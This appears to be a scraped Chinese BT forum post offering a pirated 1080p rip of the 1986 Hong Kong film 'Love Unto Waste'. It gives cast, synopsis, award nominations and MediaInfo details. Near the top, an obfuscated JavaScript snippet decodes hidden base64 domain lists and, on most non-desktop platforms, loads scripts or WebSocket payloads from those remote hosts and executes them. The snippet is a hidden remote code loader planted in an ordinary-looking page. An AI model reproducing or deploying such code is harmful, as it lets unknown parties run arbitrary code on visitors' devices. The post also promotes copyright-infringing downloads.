地下情[国粤语音轨/简繁字幕]Love.Unto.Waste.1986.BluRay.1080p.2Audio.TrueHD.5.1.x265.10bit-迅雷下载 10.42GB

版主小s 26天前 816

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 Love Unto Waste

◎片 名 地下情

◎年 代 1986

◎产 地 中国香港

◎类 别 剧情

◎语 言 粤语 / 汉语普通话

◎上映日期 1986-08-30

◎IMDb评分 6.7/10 from 188 users

◎IMDb链接 https://www.imdb.com/title/tt0090922

◎豆瓣评分 7.5/10 from 5322 users

◎豆瓣链接 https://movie.douban.com/subject/1298272/

◎片 长 96 分钟

◎导 演 关锦鹏 Stanley Kwan

◎编 剧 邱刚健 Kang Chien Chiu / 黎杰 Kit Lai

◎主 演 周润发 Yun-Fat Chow

金燕玲 Elaine Jin

蔡琴 Chin Tsai

梁朝伟 Tony Leung Chiu Wai

温碧霞 Irene Wan

周秀兰 Elaine Chow Sau-Laan

◎标 签 关锦鹏 | 梁朝伟 | 香港 | 周润发 | 香港电影 | 温碧霞 | 文艺 | 金燕玲

◎简 介

香港少女阮贝儿(温碧霞)和来自台湾的廖玉屏(金燕玲)、赵淑珍(蔡琴)皆以成名为人生目的,但现实证明她们离当明星的生活仍有一段不短的距离。三人在酒廊偶识米铺少爷张树东(梁朝伟),不久阮贝儿与其发展成同居关系。赵淑珍不明原因的死亡引来警探蓝振强(周润发),但他的所谓调查徒 具形式。廖玉屏无法安然面对赵淑珍的离去,悲痛引来张树东对其肉体的安抚,不料不小心致其怀孕。其后廖玉屏的震惊没能让张树东在取舍问题上有眉目,彼此发现所谓爱人只是爱己。而蓝振强临死前的一段话更让他们将自己看清(同他人发生关系是觉得多个人的无聊总好过一个人),可是他们依旧没有独自面对没有希望的日子的勇气。

◎获奖情况

第6届香港电影金像奖(1987)

最佳电影(提名)

最佳导演(提名) 关锦鹏

最佳编剧 邱刚健 / 黎杰

最佳男主角(提名) 梁朝伟

最佳男配角(提名) 周润发

最佳女配角 金燕玲

最佳女配角(提名) 蔡琴

最佳原创电影音乐(提名) 林敏怡

最佳原创电影歌曲(提名) 林敏怡 / 蔡琴

  1. General

  2. Unique ID : 313676225257056125683851356065839044700 (0xEBFBD7F00A9D2D47DE2E77BC75A1D85C)

  3. Complete name : Love.Unto.Waste.1986.BluRay.1080p.2Audio.TrueHD.5.1.x265.10bit-BeiTai.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 10.4 GiB

  7. Duration : 1 h 37 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 15.2 Mb/s

  10. Encoded date : UTC 2021-07-06 06:45:16

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 37 min

  20. Bit rate : 8 683 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 038 pixels

  23. Display aspect ratio : 1.85:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.182

  30. Stream size : 5.94 GiB (57%)

  31. Title : HEVC, [email protected]@High, 24 fps @ 8682 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x1038 / interlace=0 / total-frames=141076 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio #1

  42. ID : 2

  43. Format : MLP FBA

  44. Format/Info : Meridian Lossless Packing FBA

  45. Commercial name : Dolby TrueHD

  46. Codec ID : A_TRUEHD

  47. Duration : 1 h 37 min

  48. Bit rate mode : Variable

  49. Bit rate : 2 499 kb/s

  50. Maximum bit rate : 3 840 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 96.0 kHz

  54. Frame rate : 1 200.000 FPS (80 SPF)

  55. Compression mode : Lossless

  56. Stream size : 1.71 GiB (16%)

  57. Title : Cantonese Dolby TrueHD Audio 5.1 @ 3139 kbps

  58. Language : Chinese

  59. Default : Yes

  60. Forced : No


  61. Audio #2

  62. ID : 3

  63. Format : AC-3

  64. Format/Info : Audio Coding 3

  65. Commercial name : Dolby Digital

  66. Codec ID : A_AC3

  67. Duration : 1 h 37 min

  68. Bit rate mode : Constant

  69. Bit rate : 640 kb/s

  70. Channel(s) : 6 channels

  71. Channel layout : L R C LFE Ls Rs

  72. Sampling rate : 48.0 kHz

  73. Frame rate : 31.250 FPS (1536 SPF)

  74. Compression mode : Lossy

  75. Stream size : 448 MiB (4%)

  76. Title : Cantonese Dolby Digital Audio 5.1 @ 640 kbps

  77. Language : Chinese

  78. Service kind : Complete Main

  79. Default : No

  80. Forced : No


  81. Audio #3

  82. ID : 4

  83. Format : MLP FBA

  84. Format/Info : Meridian Lossless Packing FBA

  85. Commercial name : Dolby TrueHD

  86. Codec ID : A_TRUEHD

  87. Duration : 1 h 37 min

  88. Bit rate mode : Variable

  89. Bit rate : 2 513 kb/s

  90. Maximum bit rate : 3 822 kb/s

  91. Channel(s) : 6 channels

  92. Channel layout : L R C LFE Ls Rs

  93. Sampling rate : 96.0 kHz

  94. Frame rate : 1 200.000 FPS (80 SPF)

  95. Compression mode : Lossless

  96. Stream size : 1.72 GiB (17%)

  97. Title : Mandarin Dolby TrueHD Audio 5.1 @ 3153 kbps

  98. Language : Chinese

  99. Default : No

  100. Forced : No


  101. Audio #4

  102. ID : 5

  103. Format : AC-3

  104. Format/Info : Audio Coding 3

  105. Commercial name : Dolby Digital

  106. Codec ID : A_AC3

  107. Duration : 1 h 37 min

  108. Bit rate mode : Constant

  109. Bit rate : 640 kb/s

  110. Channel(s) : 6 channels

  111. Channel layout : L R C LFE Ls Rs

  112. Sampling rate : 48.0 kHz

  113. Frame rate : 31.250 FPS (1536 SPF)

  114. Compression mode : Lossy

  115. Stream size : 448 MiB (4%)

  116. Title : Mandarin Dolby Digital Audio 5.1 @ 640 kbps

  117. Language : Chinese

  118. Service kind : Complete Main

  119. Default : No

  120. Forced : No


  121. Text #1

  122. ID : 6

  123. Format : PGS

  124. Codec ID : S_HDMV/PGS

  125. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  126. Duration : 1 h 35 min

  127. Bit rate : 34.3 kb/s

  128. Count of elements : 2521

  129. Stream size : 23.4 MiB (0%)

  130. Title : Cht/SUP 繁体

  131. Language : Chinese

  132. Default : No

  133. Forced : No


  134. Text #2

  135. ID : 7

  136. Format : PGS

  137. Codec ID : S_HDMV/PGS

  138. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  139. Duration : 1 h 37 min

  140. Bit rate : 33.4 kb/s

  141. Count of elements : 2559

  142. Stream size : 23.2 MiB (0%)

  143. Title : Chs/SUP 简体

  144. Language : Chinese

  145. Default : Yes

  146. Forced : No


  147. Text #3

  148. ID : 8

  149. Format : PGS

  150. Codec ID : S_HDMV/PGS

  151. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  152. Duration : 1 h 36 min

  153. Bit rate : 43.0 kb/s

  154. Count of elements : 2563

  155. Stream size : 29.5 MiB (0%)

  156. Title : Eng/SUP

  157. Language : English

  158. Default : No

  159. Forced : No


  160. Menu

  161. 00:00:00.000 : en:第 01 章

  162. 00:04:45.250 : en:第 02 章

  163. 00:16:17.083 : en:第 03 章

  164. 00:23:42.208 : en:第 04 章

  165. 00:34:02.250 : en:第 05 章

  166. 00:42:22.167 : en:第 06 章

  167. 00:47:36.375 : en:第 07 章

  168. 00:56:04.167 : en:第 08 章

  169. 01:03:56.958 : en:第 09 章

  170. 01:10:44.667 : en:第 10 章

  171. 01:18:44.458 : en:第 11 章

  172. 01:28:48.542 : en:第 12 章




此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 剧情

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (1)

你可以在 登录 or 注册 后,对此帖发表评论!

返回